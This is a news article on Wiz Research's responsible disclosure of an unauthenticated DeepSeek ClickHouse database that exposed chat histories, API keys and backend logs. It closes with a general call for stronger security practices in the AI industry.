A publicly accessible database belonging to DeepSeek, a fast-rising Chinese AI startup, was discovered to be vulnerable, allowing full control over database operations, including access to highly sensitive internal data.
The exposure, identified by Wiz Research, included over a million log streams containing chat histories, secret keys, backend details, and other critical information.
The Wiz Research team responsibly disclosed the issue to DeepSeek, which promptly secured the database.
However, this incident underscores the growing risks associated with rapidly adopting AI technologies without robust security measures.
The Discovery: A ClickHouse Database Without Authentication
DeepSeek has gained significant attention for its innovative AI models, particularly the DeepSeek-R1 reasoning model, which rivals industry leaders like OpenAI in performance and efficiency.
As part of their routine security assessments, Wiz Research analyzed DeepSeek’s external security posture and uncovered a serious vulnerability within minutes.
The team found a publicly accessible ClickHouse database hosted on two subdomains—oauth2callback.deepseek.com and dev.deepseek.com—via open ports (8123 and 9000).
The database was completely unauthenticated, allowing anyone to execute SQL queries directly through a browser interface.
This raised immediate concerns due to the sensitive nature of the data stored within.
ClickHouse is an open-source database system designed for handling large-scale data analytics.
Its capabilities make it a valuable tool for real-time data processing but also a high-value target if exposed without proper security controls.

Upon accessing the database’s “log_stream” table through simple enumeration queries, Wiz Research discovered logs dating back to January 6, 2025.
These logs contained plaintext chat histories, API keys, backend operational metadata, and references to internal API endpoints—all of which could be exploited by malicious actors.
Implications for AI Security
The exposure at DeepSeek highlights a broader issue within the rapidly expanding AI industry: inadequate security practices surrounding critical infrastructure.
While much attention is given to futuristic AI threats like model manipulation or adversarial attacks, this incident demonstrates that basic security oversights—such as leaving databases exposed—pose an equally significant risk.
Key risks identified in this case include:
- Data Exfiltration: Attackers could have accessed sensitive logs and plaintext chat messages or even exfiltrated proprietary files using SQL commands.
- Privilege Escalation: The lack of authentication allowed potential attackers to gain full control over the database environment.
- User Data Exposure: End-user information stored in chat histories and API logs was left vulnerable to exploitation.
As organizations increasingly adopt AI-driven services, they often entrust startups like DeepSeek with sensitive data.
However, the speed of adoption frequently outpaces the implementation of robust security measures.
This creates vulnerabilities that can have far-reaching consequences for both businesses and their customers.
A Call for Stronger Security Measures
The DeepSeek incident serves as a wake-up call for the AI industry to prioritize security alongside innovation.
Startups and established companies alike must implement rigorous defenses against basic vulnerabilities such as external database exposure.
Security teams should work closely with AI engineers to ensure visibility into all aspects of their architecture and tools while adopting best practices for safeguarding sensitive data.
As AI continues its unprecedented integration into global business operations, the industry must recognize that its role as critical infrastructure comes with heightened responsibilities.
By addressing these foundational risks now, companies can build trust and resilience in an increasingly interconnected world reliant on artificial intelligence.
Also Read: